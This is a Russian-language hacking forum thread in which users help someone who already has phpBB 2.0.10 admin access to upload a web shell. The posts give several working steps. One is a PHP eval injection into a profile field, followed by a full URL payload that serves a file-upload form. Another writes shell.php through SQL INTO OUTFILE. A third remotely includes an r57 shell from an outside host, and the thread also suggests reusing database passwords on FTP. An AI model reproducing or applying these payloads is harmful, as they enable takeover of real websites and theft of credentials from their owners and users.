Форум - phpBB 2.0.10
Есть доступ к админке.
Не получается залить шелл ни через уязвимость highlight, ни через стили, ни через профайл, ни через заливку sql (восстановление БД).
Попробовал через загрузку аватары - пишет, что максимальный размер 9 кб. Такая же история (про аватару) через багу ShanKaR'а.:(
Посоветуйте что-нибудь, plizzzzzzzz !!!

Ща поковырялся и получилось c помощью видео ShAnKaR'а вставить в профиль функию phpinfo().
А bandera объяснял о функции - a:include($_GET[w])
http://forum.antichat.ru/thread24488.html
Я делал всё так и ничего не происходит.:(
Почему?

мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..

мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..
а что 9Кб это разве много по сути? ;)

увеличь размер загрузки аватарки через админку и загруси туды шелл!

а что 9Кб это разве много по сути? ;)
немного)
но раз у ТСа не вышло, значит у него шелл >9kb :logika: :D

А bandera объяснял о функции - a:include($_GET[w])

Я делал всё так и ничего не происходит.:(
Почему?
ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):

http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
:)

А чем это не нравится? Просто создаёш файл 1.sql с содержимым ниже и импортируеш:


А потом просто инклудиш: www.test2.ru/phpbb/images/avatars/shell.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt

Вот, что получается:

Error importing backup file

DEBUG MODE

SQL Error : 1045 Access denied for user 'user'@'localhost' (using password: YES)

SELECT cat_title INTO OUTFILE '/путь до папки forum/images/avatars/shell.php' FROM phpbb_categories where cat_id=99999

Line : 980
File : /путь до папки forum/admin/admin_db_utilities.php

ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):

http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
:)

Я новичок, и не совсем понимаю.... Объясни пожалуйста пошагово....

мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..

Увеличил я размер загружаемой аватары и сделал как описывал k1b0rg в статье:
http://forum.antichat.ru/thread32782.html
И всё равно ничего не вышло...:(

Пишет: Файл аватары должен быть .jpg, .gif или .png, хотя я и переименовывал в jpg, gif.

Ищи путь до какойнибудь расширенной папки не обязательно она может быть в дире с форумом. И ещё подредактируй файл 1.sql
фигню пишешь дружище :) ты сам то пробовал только на своем компе небось?

меня слушай автор топика

фигню пишешь дружище :) ты сам то пробовал только на своем компе небось?

меня слушай автор топика

ShAnKaR, объясни пожалуйста пошагово...

ShAnKaR, объясни пожалуйста пошагово...

кароче

Ща поковырялся и получилось c помощью видео ShAnKaR'а вставить в профиль функию phpinfo().
А bandera объяснял о функции - a:include($_GET[w])

вот вместо a:include($_GET[w])
ставишь a:eval($_GET[w])
потом идешь как и в случае с include по адресу
/profile.php?mode=editprofile&w=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
если все ok появляется формочка для заливки файла , и тут уже можешь залить все что надо, залитое сохраняется в корневой папке форума в данном случае, это самый простой способ я думаю , но можно например воспользоватся другими функциями php например fopen,fwrite и тп для создания файла.
можно так же если не получится залить файл в папку с форумом залить в /tmp, а потом проинклудить его из /tmp.
если вобще ни куда не получится залить, можно посмотреть конфиг форума с пасом от бд и попробовать пасы на ftp например.